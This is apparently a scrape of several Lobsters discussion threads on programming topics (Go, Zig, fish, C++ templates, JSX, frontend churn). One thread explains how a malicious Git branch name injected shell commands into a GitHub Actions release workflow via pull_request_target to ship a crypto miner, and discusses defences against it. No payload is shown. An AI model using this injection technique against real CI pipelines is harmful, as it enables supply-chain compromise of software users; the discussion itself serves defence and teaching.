But that also seems to be the implication of the java case where you wrote ‘might corrupt a given object’. So the program can still suffer knock on errors of an essentially non-deterministic nature. Just because the runtime is still valid, does not imply that the overall program is.
So how is that any different?
In Java the object you racily accessed might get into a bad state you didn’t want to get it into, but in Go, you might write into some random other object that had nothing to do with what you were accessing. It’s plain old UB that can result in pretty much anything you can think of.
The scope to which such an error can propagate is way different.
If I open a new thread and create a list with a few objects, they will 100% work in Java’s case. You can’t say the same for Go, as a hidden corruption of the runtime can rear its ugly head anywhere.
Preach. What reinforces this is the awful discourse around software dev.
Advocates for $CURRENT_TECH take most of the oxygen in the room, so toxic positivity is taken to be normative. Software design is often denigrated in favor of duct-taping more libraries together, as people love to advertise that they worship at the altar of Business Value exclusively. Most any design/testing philosophy is usually seen as “too hard,” despite bug counts being where they are. Devs regard make-work like keeping up with tiny, breaking package updates as equivalent to actually delivering value.
It’s like it’s a big social game where the objective is pretend to care less about craft and instead signal properly that you are in the group of software developers.
As I watch the city burn around me, it’s hard not to feel that way too.
I think it’s societal pressures that cause the incentive structure. However, I do think that there is an insidious path dependence that cements a worse is better attitude: you start with buggy software, you try to make something more better, people take a chance, it fails, and people assume that nothing better can happen so they don’t invest in better software. Progress is slow and requires risk.
At the end of the day, you are trying to make something better and more aligned with your values. I hope you succeed. I would just caution against calling tens of thousands of people amateurs. No need to paint with so broad a brush.
NB: I don’t like Go and I don’t work for Google. (Just to preempt allegations. :] )
See it as a stepping stone. I started as a PHP developer and then moved to Go. Rust or Zig will be my next language. If Go would replace inefficient and messy languages like PHP, Python and Ruby, that would be a win, I think. The good thing about Go is that it is simple enough to appeal to that immense group of amateur developers without taste.
Go will never replace PHP, python or Ruby because they don’t occupy the same niche to begin with.
Also, it’s rich calling these “messy and inefficient” (besides the usual caveat that language implementations are that can be slow), especially with reference to Go which is at most in the middle on a theoretical “close to bare metal” scale (the default go compiler does very little optimizations, that’s how it can output binaries fast, plus the runtime has a fairly simple GC which is no performance champion), and I think it itself is a fairly good contender on the messiness scale, given its weak type system and two million dollars mistakes instead of only one!
At least Ruby and Python give you a fast and dynamic environment for explorative programming and scripting with the capability of using very productive libraries due to the expressiveness of these languages, something in which Go is quite lacking (and that can be a fair tradeoff, mind you. But so is not taking this tradeoff).
Anyways, this can get subjective pretty quickly, resulting in language flame wars.
Fair enough. But I do think the niches of all of those languages have a large overlap. I group them all in the category: We want to run something on a server, and we don’t want it to be difficult.
‘Messiness’ is just a negative word for ‘dynamic environment.’ Both can be applicable, sometimes even at the same time. But if we are talking about the first quote, about the proliferation of bugs, then the negative interpretation feels like it has more weight. For me at least.
Thank you for linking to your talk, I really enjoyed it.
Lol great negative PR for zig
There are two kinds of languages. Those that are tasteful and those that are actually used. 🤷♂️
List of commercial companies and non-profit organizations using Zig in production. Some serious software (Bun, TigerBeetle, Tuple) in there, even if the lists aren’t long yet.
I had a better opinion of Zig creator before. Well-well-well.
You didn’t even mention my least favorite “feature” of Go: panic and recover. Totally not throw/catch!
I say this as someone who has been writing Go for years. I love Go for problems I just want done ASAP but I don’t want to totally screw it up, and I love Zig for problems whose solutions I want to be as good as it possibly can be
I’m gonna learn how to (consistently) finish what I start.
I’ll start with a non-exhaustive list to track all of the things that I’ve started and not finished, so I can explicitly prune the ones I don’t intend to work on, and at least have something to go back to whenever I do have the energy to work on something.
If you figure out how, please let me know :’(
I’ve already made some progress in 2024 on it, so I’ll share a little bit here to help out.
The core insight is that I’m much more likely to finish something if I see consistent progress being made as I work on something, while my “typical” approach has been to ruminate on something for ~3 years and then “draw the rest of the owl” in a single weekend (see: most bunker labs posts as one example). The reason said typical approach “works” is it essentially makes it so all of the potential barriers to finishing the thing are gone (as I’ve already “finished it in my head”), so I can just go straight to the final product. This obviously doesn’t work for a large subset of problems (i.e. anything but the kind of research PoC I “usually” tend to put out).
Once I got that insight out of the way, the question became “how do I allow for lower issue resolution AoT such that I can make projects that are longer?”. What I’ve tried in 2024 so far has been REPL driven development (to a greater degree than I’ve been doing previously, full on Conjure integration, proper setup, etc) and it definitely helped a bit.
In 2025, I’m going to try and “practice finishing”, in the sense of trying to actually either eliminate projects or finish them before moving on to new stuff. I’ve actually been trying to force myself to make a new blog post every month (even if it doesn’t measure up to my usual standards; it’s a different medium), and I also fully completed AoC with a time limit per day (minus the last day to mop up the couple of bits that I had left to do). It’s too early to tell for these yet, but I suspect at the end of next year I’ll see some progress there.
Hope that helps at least a bit (it strongly depends on whether the source for your struggles resembles mine). Happy new year!
If either of you are interested in going nuclear, I can recommend Beeminder which I’ve been using for over a year now: https://www.beeminder.com
In short, you set a goal like say; writing 1 blog post a month and if you don’t reach the goal, you get charged $x. The aim here isn’t to never lose money but to reach a point where you’re sufficiently incentivised (financially) to do whatever your goal is.
It’s pretty nutty at first but once you get into it, it becomes a pretty fool proof setup where I know if I stick something in Beeminder, it’ll get done whether I like it or not.
The founders have been around for over a decade as well and if you derail (don’t hit your goal) for a legitimate reason like you were sick, there are no questions asked around refunds.
It’s less of a traditional business and more of an economics experiment let loose but it works for a lot of people. There’s plenty of theorising on their blog as well: https://blog.beeminder.com/defail/
I had the same problem (that I would be working on too many things and would start new things before finishing existing things) so I instituted a system like OP in Things.app.
I only use projects for things that will require long and sustained effort and I put them into areas called Now/Next/Later. The idea is to work only on things in Now and to finish stuff before pulling in new things.
Each Things project has metadata and a slug that is also the tag for all mails relating to it and the subfolder in my projects directory etc.
Here’s how it looks: https://share.cleanshot.com/wHfd1shv
One thing I’ve found helpful is I explicitly list out next steps of my project in Obsidian as a checklist.
What I realized is that planning the project requires executive function, which can be worn down by the time I get time to push a project forward at the end of the day. These steps can be very simple or more complex. The goal is to get them down somewhere so that your brain doesn’t have to carry them around anymore. I usually write these early in the day if needed, when I have the most clarity.
Essentially, I’m coaching myself.
Oof - this is a (helpful!) tough observation to hear, because I know this (intellectually) from reading Getting Things Done, and now recognize that I’ve been dropping the ball in a way that I should have already known. Thank you for the prompt to pay more attention to my organizational systems and repair them to a more useful state!
I only realized it when coaching some coworkers. I tried it for myself and it really helps me.
Just tried doing a little dev over winter break without it and I definitely missed it! Easy to get lost in mazes of my own creation inadvertently.
Good luck, you’ll have beaten me to it :)
A mental trick I learned is to explicitly decide to be done with something, and to let that count as finished too.
I think it all boils down to determination. If you believe in yourself and commit to finishing everything you start, you will quickly arrive at the conclusion that you shouldn’t start anything.
Thanks for the write up!
I saw mention of async prompts becoming a core feature. Would love to help out on this. Have previous experience with Rust (original watchexec author) and fish async prompts (created lucid, the first really solid async prompt IMHO).
Some of you really need to join a trade union and get serious about having a reasonable work/life balance.
This is insane. Is the rest of the team that bad that they couldn’t handle it? Making Sentry calls blocking was a clear mistake, not sure how easy it was to avoid, but:
it should have been fixed the first time! Why does the same blocking issue occurs after 2 days??
knowing the issue, why couldn’t the dev just disable Sentry calls made by the app (assuming making them non blocking was hard, which I don’t believe) instead of yapping about moving to the cloud?
Some people really need to learn how to disconnect.
The response from the wife was kind of sad, too. Kind of accepts that this is how life is, that all he cares about is work. I was surprised the fainting in the bathroom didn’t lead to an ER visit.
Hindsight is 20/20, but when this happened again I’d lean toward waking the dev up in the middle of the night, show him the carnage, and then say, “make it work ASAP.” You can also say you’re open to discussing cloud migration in the future but for now prod needs to stay up.
Seems like the organizational structure protects him from the consequences of his actions too much.
The minimum team size is one. Why does there need to be anybody else who can handle it?
Seems like there was just one dev too.
The one dev could have handled it, disabling Sentry from the app was always an option
Yes. The real lesson may be to develop the soft skills to define when a problem must be fixed elsewhere and make other people agree and action it that way.
I wish this article had elaborated a bit on specific things creating a “Template Metapocalypse” and how they were later solved. To me, C++ still is a language where the standard library - STL - is a template library. I’m not denying that C++11 did address many problems, but developers still need to think a lot about what is a compile time expression and what is a runtime expression, and that the language imposes different constraints on each.
I’m not certain they were solved. But I think there was a collective opinion at some point that perhaps we might’ve gone too far with templates and we should back off a bit, despite everyone believing that snuffing enough Alexandrescu-inspired templating would bring us to valhalla.
I think there is a difference between say boost::regex (which IIRC is compile-time regexes) and STL … STL is definitely elaborate, but it works fine for me. I’ve never used anything in Boost, which seems to have been heavily influenced by template metaprogramming “fashion”
The error messages could be better, I think that is fundamental though
I disagree that the bad error messages problem is fundamental: cpp compilers could encode some common template patterns as internal state and detect common mistakes. This is possible, it “just” increases the compiler’s complexity because it now has to deal with a meta-cpp language. Rust is generally regarded as having mostly good errors (I’m proud of that), and some of that is smart language design that pushes restrictions closer and closer to the definition so that the compiler can have more information available about the problem, but I’d wager that the majority of it is attributable to rustc collecting metadata and doing analysis beyond what is needed to build a functional Rust compiler.
std::regex is originally based on boost::regex design and API, both are runtime regexes. That said, boost::regex kept evolving and improving unlike the std:: one. Compile-time regex is https://github.com/hanickadot/compile-time-regular-expressions a very fine library which should be the first tool to reach for when one needs regex in C++ as it’s somewhat uncommon to have to create regexes at runtime. If you actually do, for instance because you’re building filters based on user input (or simply because your users asked “i want to be able to put regexes in fields”, I’d recommend using google’s re2 library.
Ah OK thanks for the correction, probably should have looked that up … I haven’t used Boost, but I know Boost favors compile time, and it did so back when C++ was weaker at compile time (e.g. before C++ 11, 14, 17 , …)
This was a long time ago, but FWIW
There are probably still a lot of C++ jobs like this, as C++ codebases can be pretty old. The original question was about “Template metapocalypse” – I guess my answer is that C++ is very heterogeneous and you may not have that problem.
I don’t know to be honest, I’ve been doing C++ professionnally for quite some time now and have really never seen this kind of job. Even something like arduino ships modern C++ with pretty much full C++ standard library by default.
Boost is definitely intended to be template based. Bear in mind it’s
overalmost 30 years old and back in the day the performance gains at runtime were significant AND we didn’t expect compilation to be fast.Lovely to see the changes and improvements. I keep eyeing Fish to replace my Zsh setup, but worry about losing out on years of muscle memory for POSIX-ish shell syntax.
In other news, I wish the blog has an RSS feed, I’d like to keep up to date with new releases to read about features etc…
We’ve made great progress in supporting posix syntax and features that don’t clash outright with fish. You should give it another try!
As a prime example of this, a while back they added the ability to do
FOO="blah" some-commandinstead of the previous version where you need to prefix withenv. This alone resolved something like 90% of the ways my daily use of fish diverged from what I would have written in bash or zsh.I colleague of mine recently switched. That surprised me because he had quite some zsh setup and as far as I know fish does not really offer more feature-wise. He told me that he likes fish because it is more „snappy“.
Out of the box, Fish has far more features than Zsh. It doesn’t offer anything else feature-wise if you install all the Zsh modules that were created to implement Fish features, but they’re fiddly and often just don’t work as well. If you want Zsh like Fish, just use Fish.
I agree. The point is if you already invested the time to set up zsh with all kinds of modules, then switching to fish is not much of an improvement. So I don’t recommend fish to zsh power users.
That said, I have now the anecdotal evidence from one person that fish was still worth switching.
It’s far less janky than zsh, mostly because you have less user-authored code (users in general, not you specifically). I don’t touch my config for months on end and things just keep humming along well.
I don’t touch my Zsh config for years on end and likewise. On the other hand, I imagine my Zsh config took longer to write than your Fish config, though.
it is still an improvement because you end up with less shell code
I have also encountered people (online) who didn’t know that you could render web pages on the server.
React was their default; I saw some static websites that were just static JSX in React. Like if you wanted to put up some photos of your apartment or vacation on your own domain, you would create a React app for that.
People learn by imitation, and that’s 100% necessary in software, so it’s not too surprising. But yeah this is not a good way to do it.
The web is objectively worse that way, i.e. if you have ever seen an non-technical older person trying to navigate the little pop-out hamburger menus and so forth. Or a person without a fast mobile connection.
If I look back a couple decades, when I used Windows, I definitely remember that shell and FTP were barriers to web publishing. It was hard to figure out where to put stuff, and how to look at it.
And just synchronizing it was a problem
PHP was also something I never understood until I learned shell :-) I can see how JavaScript is more natural than PHP for some, even though PHP lets you render on the server.
To be fair, JSX is a pleasurable way to sling together HTML, regardless of if it’s on the frontend or backend.
Many backend server frameworks have things similar to JSX.
That’s not completely true, one beautiful JSX thing is that any JSX HTML node is a value, you can use all your language at your disposal to create that HTML. Most backend server frameworks use templating instead. For most cases both are equivalent, but sometimes being able to put HTML values in lists and dictionaries and have the full power of the language do come in handy.
Well, that’s exactly what your OP said. Here is an example in Scala. It’s the same style. It’s not like this was invented by react or even by frontend libraries. In fact, Scalatags for example is even better than JSX because it is really just values and doesn’t even need any special syntax preprocessor. It is pure, plain Scala code.
Maybe, but then just pick a better one? OP said “many” and not “most”.
Fine, I misread many as most as I had just woken up. But I’m a bit baffled that a post saying “pick a better one” for any engineering topic has been upvoted like this. Let me go to my team and let them know that we should migrate all our Ruby app to Scala so we can get ScalaTags. JSX was the first such exposure of a values-based HTML builder for mainstream use, you and your brother comment talk about Scala and Lisp as examples, two very niche languages.
When did I say that this was invented by React? I’m just saying that you can use JSX both on front and back which makes it useful for generating HTML. Your post, your sibling and the OP just sound slightly butthurt at Javascript for some reason, and it’s not my favourite language by any stretch of the imagination, but when someone says “JSX is a good way to generate HTML” and the response is “well, other languages have similar things as well”, I just find that as arguing in bad faith and not trying to bring anything constructive to the conversation, same as the rest of the thread.
But the point is that you wouldn’t have to - you could use a Ruby workalike, or implement one yourself. Something like Markaby is exactly that. Just take these good ideas from other languages and use it in yours.
Anyway, it sounds like we are in agreement that this would be better than just adopting JavaScript just because it is one of the few non-niche languages which happens to have such a language-oriented support for tags-as-objects like JSX.
I found that after all I prefer to write what is going to end up as HTML in something that looks as much as HTML as possible. I have tried the it’s-just-pure-data-and-functions approach (mostly with elm-ui, which replaces both HTML and CSS), but in the end I don’t like context switching it forces on my brain. HTML templates with as much strong checks as possible is my current preference. (Of course, it’s excellent if you can also hook into the HTML as a data structure to do manipulations at some stage.)
For doing JSX (along with other frameworks) on the backend, Astro is excellent.
That’s fair. There’s advantages and disadvantages when it comes to emulating the syntax of a target language in the host language. I also find JSX not too bad - however, one has to learn it first which definitely is a lot of overhead, we just tend to forget that once we have learned and used it for a long time.
In the Lisp world, it is super common to represent HTML/XML elements as lists. There’s nothing more natural than performing list operations in Lisp (after all, Lisp stands for LISt Processing). I don’t know how old this is, but it certainly predates React and JSX (Scheme’s SXML has been around since at least the early naughts).
Yeah, JSX is just a weird specialized language for quasiquotation of one specific kind of data that requires an additional compilation step. At least it’s not string templating, I guess…
I’m aware, I wrote such a lib for common lisp. I was talking that in most frameworks most people use they are still at the templating world.
It’s a shame other languages don’t really have this. I guess having SXSLT transformation is the closest most get.
Many languages have this, here’s a tiny sample: https://github.com/yawaramin/dream-html?tab=readme-ov-file#prior-artdesign-notes
Every mainstream as well as many niche languages have libraries that build HTML as pure values in your language itself, allowing the full power of the language to be used–defining functions, using control flow syntax, and so on. I predict this approach will become even more popular over time as server-driven apps have a resurgence.
JSX is one among many 😉
I am not a web developer at all, and do not keep up with web trends, so the first time I heard the term “server-side rendering” I was fascinated and mildly horrified. How were servers rendering a web page? Were they rendering to a PNG and sending that to the browser to display?
I must say I was rather disappointed to learn that server-side rendering just means that the server sends HTML, which is rather anticlimactic, though much more sane than sending a PNG. (I still don’t understand why HTML is considered “rendering” given that the browser very much still needs to render it to a visual form, but that’s neither here nor there.)
The Bible says “Render unto Caesar the things that are Caesar’s, and unto God the things that are God’s”. Adapting that to today’s question: “Render unto the Screen the things that are the Screen’s, and unto the Browser the things that are the Browser’s”. The screen works in images, the browser works in html. Therefore, you render unto the Browser the HTML. Thus saith the Blasphemy.
(so personally I also think it is an overused word and it sounds silly to me, but the dictionary definition of the word “render” is to extract, convert, deliver, submit, etc. So this use is perfectly inline with the definition and with centuries of usage irl so i can’t complain too much really.)
You can render a template (as in, plug in values for the placeholders in an HTML skeleton), and that’s the intended usage here I think.
I don’t think it would be a particularly useful distinction to make; as others said you generally “render” HTML when you turn a templated file into valid HTML, or when you generate HTML from another arbitrary format. You could also use “materialize” if you’re writing it to a file, or you could make the argument that it’s compilers all the way down, but IMO that would be splitting hairs.
I’m reminded of the “transpiler vs compiler” ‘debate’, which is also all a bit academic (or rather, the total opposite; vibe-y and whatever/who cares!).
It seems that was a phase? The term transpiler annoys me a bit, but I don’t remember seeing it for quite a while now.
Worked very well for Opera Mini for years. Made very low-end web clients far more usable. What amazed me was how well interactivity worked.
So now I want a server side rendering framework that produces a PNG that fits the width of my screen. This could be awesome!
There was a startup whose idea was to stream (as in video stream) web browsing similar to cloud gaming: https://www.theverge.com/2021/4/29/22408818/mighty-browser-chrome-cloud-streaming-web
It would probably be smaller than what is being shipped as a web page these days.
Exactly. The term is simply wrong…
ESL issue. “To render” is fairly broad term meaning something is to provide/concoct/actuate, has little to do with graphics in general.
Technically true, but in the context of websites, “render” is almost always used in a certain way. Using it in a different way renders the optimizations my brain is doing useless.
The way that seems ‘different’ to you is the way that is idiomatic in the context of websites 😉
Unless it was being rendered on the client, I don’t see what’s wrong with that. JSX and React were basically the templating language they were using. There’s no reason that setup cannot be fully server-generated and served as static HTML, and they could use any of the thousands of react components out there.
Yeah if you’re using it as a static site generator, it could be perfectly fine
I don’t have a link handy, but the site I was thinking about had a big janky template with pop-out hamburger menus, so it was definitely being rendered client side. It was slow and big.
I’m hoping tools like Astro (and other JS frameworks w/ SSR) can shed this baggage. Astro will render your React components to static HTML by default, with normal clientside loading being done on a per-component basis (at least within the initial Astro component you’re calling the React component from).
I’m not sure I would call a custom file type
.astrothat renders TS, JSX, and MD/X split by a frontmatter “shedding baggage”. In fact, I think we could argue that astro is a symptom of the exact same problem you are illustrating from that quote.That framework is going to die the same way that Next.JS will: death by a thousand features.
huh couldn’t disagree more. Astro is specifically fixing the issue quoted: now you can just make a React app and your baseline perf for your static bits is now the same as any other framework. The baggage I’m referring to would be the awful SSG frameworks I’ve used that are more difficult to hold correctly than Astro, and of course require plenty of other file types to do what
.astrodoes (.rb,.py,.yml, etc.). The State of JS survey seems to indicate that people are sharing my sentiments (Astro has a retention rate of 94%, the highest of the “metaframeworks”).I don’t know if I could nail what dictates the whims of devs, but I know it isn’t feature count. If Next dies, it will be because some framework with SSG, SSR, ISR, PPR, RSC, and a dozen more acronym’d features replaced it. (And because OpenNext still isn’t finished.)
Astro’s design is quite nice. It’s flexing into SSR web apps pretty nicely I’d say. The way they organize things isn’t always my favorite, but if it means I can avoid ever touching NextJS I’m happy.
I’m starting to find a groove with TS.
Biggest pet peeve is how VSCode doesn’t seem to surface errors across the whole project: I have to open up files that were affected by a rename of an exported symbol to see red squigglies show up. Feels regressive from a usability perspective, as the computer knows this information, and all the older languages of yore could do this easily in an IDE.
I’m able to do that in IntelliJ. I was surprised it didn’t come up as a setting in vscode. It looks like they’ve been trying to solve the issue since 2016.
https://github.com/microsoft/vscode/issues/13953
For those who are curious but don’t want to pick through the github issue threads:
A malicious PR making a very innocent looking change to the README used a branch name with shell commands in it, formatted in a way that would cause CI jobs to execute those commands when performing a build for upload to PyPi. Those commands downloaded a crypto miner and embedded it into the release package.
So the automated builds that were getting uploaded to PyPi had the miner, but the source in github did not and any build you produced manually by cloning the repository and running a build on your local machine would not have it either.
It’s an interesting attack. Hopefully we’ll see a more detailed description of why a branch name from a PR was getting consumed by GitHub CI in a way that could inject commands.
There was an action that echo’d the branch name without sanitizing anything: https://github.com/advisories/GHSA-7x29-qqmq-v6qc
Another lesson in never trusting user input
I don’t think “never trusting user input” is the right lesson to learn here. Why? Because I don’t think the whoever wrote that code was aware they were trusting the branch name, or what properties of the branch name exactly they were trusting. So the lesson is not really actionable.
I think the lesson is that these kinds of string-replacement based systems (YAML templates, shell variable expansion etc.) just naturally invite these issues. They are inherently unsafe and we should be teaching people to use safer alternatives instead of teaching them to be vigilant 100% of the time.
For e.g. SQL queries it seems the industry has learned the lesson and you’ll rightfully get ridiculed for building your queries via naive string interpolation instead of using a query builder, stored procedures or something of the sort. Now we need to realize that CI workflows, helm charts and everything else using string-level YAML templating is the same deal.
The FP people have a mantra “parse, don’t validate” for consuming text. I think we need another one for producing text that’s just as snappy. Maybe “serialize, don’t sanitize”?
I’m wishing for a CI/automation tool that would provide functionality like “check out a git branch” as functions in a high-level language, not as shell commands embedded in a data file, so that user input is never sent to a shell directly at all. Maybe I should make one…
Before all the hip yaml based CI systems, like github actions, pretty much everyone was using Jenkins.
The sorta modern way to use Jenkins these days is to write Groovy script, which has stuff like
checkout scm, and various other commands. Most of these are from Java plugins, and so the command never ends up going anywhere near a shell, though you do see a lot of use of the shell command function in practice (i.e.sh "make").Kinda a shame that Jenkins is so wildly unpopular, and these weird yaml-based systems are what’s in vogue. Jenkins isn’t as bad as people make it out to be in my opinion.
Please do build something though because Jenkins isn’t exactly good either, and I doubt anyone would pick Groovy as a language for anything today.
I’ve used Jenkins quite a bit, that’s one of the inspiration source for that idea indeed. But Groovy is a rather cursed language, especially by modern standards… it’s certainly one of my least favorite parts of Jenkins.
My idea for a shell-less automation tool is closer to Ansible than to Jenkins but it’s just a vague idea so far. I need to summarize it and share it for a discussion sometime.
groovy is okay. Not the best language, but way ahead any other language I’ve ever seen in a popular CI solution. And ansible should die.
Have you considered Dagger?
edit: I just had to read a little down and someone else points you the same way…
I haven’t heard about it before it was suggested in this thread, I’m going to give it a try.
I use Groovy at
$DAILYJOB, and am currently learning Ruby (which has a lot more job listings as Elixir). The appeal of both languages are the same: it is incredibly easy to design DSLs with it (basically what Jenkins and Gradle use). Which is precisely what I work with at$DAILYJOB. The fact it’s JVM-based is the icing on the cake, because it’s easy to deploy in the clients’ environments.Dagger looks interesting for this sort of use case: https://dagger.io/
This looks really interesting, thanks for the pointer! Maybe it’s already good for things I want to do and I don’t need to make anything at all, or may contribute something to it.
That’d be lovely.
The generation of devs that grew up on Jenkins (including myself) got used to seeing CI as “just” a bunch of shell scripts. But it’s tedious as hell, and you end up programming shell via yaml, which makes me sympathetic to vulns like these.
Yeah in dealing with github’s yaml hell I’ve been wishing for something closer to a typed programming language with a proper library e.g. some sort of simplified-haskell DSL à la Elm, Nix, or Dhall.
They all do? They all provide ways to build specific branches defined in yaml files or even via UIs rather than letting that work for your shell scripts. Personally I find all those yaml meta-languages all inferior than just writing a shell script. And for one and a half decades I’ve been looking for an answer to the question:
What’s the value of a CI server other than running a command on commit?
But back to your point. Why? What you need to do is sanitize user input. That is completely independent of being shell script versus another language. Shellscripts are actually higher level than general purpose programming languages.
I’m certainly not saying that one doesn’t need to sanitize user input.
But I want the underlying system to provide a baseline level of safety. Like in Python, unless I’m calling
eval()it doesn’t matter that some input may contain the character sequenceos.system(...; and if I’m not callingos.system()and friends, it doesn’t matter if a string may haverm -rfin it. When absolutely any data may end up being executed as code at any time, the system has a problem, as of me.Buildbot also belongs on the list of “systems old enough to predate YAML-everywhere”. It certainly has its weaknesses today, but its config is Python-based.
In GitHub Actions specifically, there’s also a very straightforward fix: instead of interpolating a string in the shell script itself, set any values you want to use as env vars and use those instead. e.g.:
I don’t think string replacement systems are bad per se. Sure, suboptimal in virtually all senses. But I think the biggest issue is a lack of good defaults and a requirement to explicitly indicate that you want the engine to do something unsafe. Consider the following in GH Actions:
I do not see any major difference immediately. Compare to Pug (nee Jade):
Using an unescaped string directly is clear to the reader and is not possible without an opt-in. At the same time, the opt-in is a matter of a single-char change, so one cannot decry the measure as too onerous. The mantra should be to make unescaped string usage explicit (and discouraged by default).
But to escape a string correctly, you need to know what kind of context you’re interpolating it into. E.g. if you’re generating a YAML file with string values that are lines of shell script, you might need both shell and YAML escaping in that context, layered correctly. Which is already starting to look less like string interpolation and more like serialization.
A few yearsOver a decade ago (jesus, time flies!) I came up with an ordered list of approaches in descending order of safety. My main mantra was “structural safety” - instead of ad-hoc escaping, try to fix the problem in a way that completely erases injection-type security issues in a structural way.I’m reminded of my similar post focused more on encoding (from the same year! hooooboy).
Good post! I’m happy to say that CHICKEN (finally!) does encoding correctly in version 6.
Serialize, don’t sanitize… I love it! I’m gonna start saying this.
AFAIU, the echoing is not the problem, and sanitizing wouldn’t help.
The problem is that before the script is even executed, parts of its code (the
${{ ... }}stuff) are string-replaced.Yeah. The problem is that the echo command interpretes things like
${{...}}and executes it. Or is it the shell that does it in any string? I’m not even sure and that is problem. No high level language does that. Javascript uses eval, which is already bad enough, but at least you can’t use it inside a string. You can probanly dohello ${eval(...)}but then it is clear that you are evaluating the code inside.The
${{...}}are replaced by the Github CI system before the echo is even run: https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injectionsIt’s the shell that evaluates
$...syntax.$(cmd)executescmd,${VAR}reads shell variablesVARand in both cases the shell replaces the$...with the output before calling the echo program with the result. Echo is just a dumb program that spits out the arguments its given.Edit: but the ${{ syntax is GitHub Actions’ own syntax, the shell doesn’t see that as GH Actions evaluates it before running the shell command.
Oh thanks for explaining!
The part I don’t get is how this is escalated to the publish, that workflow only seems to run off of the main branch or a workflow dispatch.
cf https://lobste.rs/s/btagmw/maliciously_crafted_github_branch_name#c_4z3405 it seems they were using the pull_request_target event which grants PR CI’s access to repo secrets, so they could not only inject the miner, but publish a release?
Does anyone have a copy of the script so we can see what it did?
Funny that they managed to mine only about $30 :)
Honestly, shining a spotlight on this attack with a mostly harmless crypto miner is a great outcome.
Less obvious key-stealing malware probably would have caused far more pain.
I knew crypto would have great use cases eventually
The
pull_request_targetevent that was used here is privilege escalation similar to sudo – it gives you access to secrets etc.Like all privilege escalation code, this should be very carefully written, fuzzed, and audited. Certainly a shell script is exactly wrong – sh was never designed to handle untrusted input in sensitive scenarios. Really it’s on GitHub Actions for making shell script-based privilege escalation code the easy path.
At the very least you want to use a language like Rust, leveraging the type system to carefully encapsulate untrusted code, along with property-based testing/fuzzing for untrusted inputs. This is an inherently serious, complex problem, and folks writing code to solve it should have to grapple with the complexity.
cf https://lobste.rs/s/btagmw/maliciously_crafted_github_branch_name#c_4z3405 it seems they were using the pull_request_target event which grants PR CI’s access to repo secrets, so they could not only inject the miner, but publish a release?
Does anyone have a copy of the script so we can see what it did?
Funny that they managed to mine only about $30 :)
Wow. I was looking for that kind of explanation and hadn’t found it yet. Thank you for finding and sharing it.
No, the lesson is to never use bash, except for using to start something that is not bash.
Oh, this is probably a better top level link for this post!
This is the offending PR
https://github.com/ultralytics/ultralytics/pull/18018
A bot made the PR? How does that work?
I don’t know if it was a bot or not (but that is probably irrelevant). The problem in the PR lies in the branch name which executed arbitrary code during GitHub Actions. Sorry if I misunderstood your question.
Hm, the dots don’t connect for me yet. I can just make a PR with changes to build process, and CI would test it, but that should be fine, because PRs run without access to secrets, right?
It’s only when the PR is merged and CI is run on the main branch that secrets are available, right?
So would it be correct to say that the PR was merged into main, and, when running CI on the main branch, something echoed the branch name of recently-merged PR?
Ah, I am confused!
See https://stackoverflow.com/questions/74957218/what-is-the-difference-between-pull-request-and-pull-request-target-event-in-git
There’a a way to opt-in to trigger workflow with main branch secrets when a PR is submitted, and that’s exactly what happened here.
I don’t get why this option exists!
Why would you ever want to expose your secrets to a pull request on an open source project? Once you do that, they’re not actually secrets, they’re just … weakly-obscured configuration settings. This is far from the first time this github “feature” has been used to attack a project. Why do people keep turning it on? Why hasn’t github removed it?
If I understand it correctly, I can maybe see it used in a non-public context, like for a companies internal CI.
But for open source and public repos it makes no sense. Even if it’s not an attack like in this case, a simple “echo …” makes the secrets no longer secret.
Prioritizing features over security makes total sense in this context! This was eloquently formulated by @indygreg! Actions:
You clearly want them to be as powerful as possible!
Note that the version of the workflow that’s used is the one in the target branch, not the one in the proposed branch.
There are legitimate use cases for this kind of privilege escalation, but GHA’s semiotics for it are all wrong. It should feel like a Serious, Weighty piece of code that should be carefully validated and audited. Shell scripts should be banned, not the default.
Thanks for the explanation, I was literally about to post a question to see if I understood it correctly. I am absolutely paranoid about the Actions running on my Github repos, it would seem to be that a closed PR should not be involved in any workflow. While the branch name was malicious, is there also a best practice to pull out here for maintainers?
Don’t ever use
pull_request_targettrigger, and, if you do, definitely don’t give that CI job creds to publish your stuff.The root cause here is not shell injection. The root cause is that untrusted input gets into CI run with creds at all. Of course, GitHub actions doesn’t do that by default, and you have to explicitly opt-into this with
pull_request_target. See the linked SO answer in a sibling commnet, it explains the issue quite nicely.Ah, comment by Foxboron clarifies that what happened here is not the job directly publishing malicious code, but rather poisoning the build cache to make the main branch CI pull bad data in! Clever! So, just don’t give any permissions for pull_request_trigger jobs!
My public repos don’t run CI jobs for PRs automatically, it has to be manually approved. I think this is the default. Not sure what happened in this case though.
By default it has to be approved for first-time contributors. Not too hard to get an easy PR merged in and get access to auto-running them.
It is totally fine to run CI on PR. CI for PRs does not get to use repository secrets, unless you go out of your way to also include secrets.
If you think your security depends on PRs not triggering CI then it’s is likely that either:
GitHub “don’t run CI for first time contributors” has nothing to do with security and has everything to do with using maintainer’s human judgement to protect free GitHub runners free compute from being used for mining crypto.
That is, this is a feature to protect GitHub/Microsoft, not your project.
Should be easily solvable by billing those minutes to the PR creator.
I guess there is also the situation where you provide your own runner rather than buying it from Github. In that case it seems like a reasonable precaution to restrict unknown people from using it.
Yes! I sympathize GitHub for having to implement something here on a short notice when this happened the first time, but I am dismayed that they didn’t get to implementing a proper solution here: https://matklad.github.io/2022/10/24/actions-permissions.html
Yes, the security with self-hosted runners is different. If you use non-sandboxed self-hosted runners, they should never be used for PRs.
Thank you, that’s a great summary, and a very interesting attack vector.
It’s strange (to me) that a release would be created off of an arbitrary user created branch, but I’m sure there’s a reason for it. In years and years of working with build automation I’ve never thought about that kind of code injection attack, so it’s something I’ll start keeping in mind when doing that kind of work.
Frontend technologies are relatively new compared to backend counterparts and they are still developing, thus in constant flux. What you’re experiencing is, which may sound ridiculous, a revolution. That’s why the APIs change so much, we’re still figuring this out. I have to admit it’s a lot of churn, but it’s necessary for a better future.
My suggestion would be to either choose a boring and stable alternative, e.g. Ember, or stay in the current major and push against the FOMO. Switching to htmx works well too, albeit a large refactor IMO and has tradeoffs that may be too much depending on project requirements.
Is it, though? Frontend is basically doing, these days, the work that a GUI toolkit used to do on desktop, since frontend developers have decided to reject the platform-native toolkit and implement their own, using it only as a low-level rendering target. You do see some churn in desktop GUI toolkits, but nothing like in web frontend.
Most stewards of desktop GUI frameworks did a decent job of backwards compatibility. Not always great, but you didn’t worry about it to this extent.
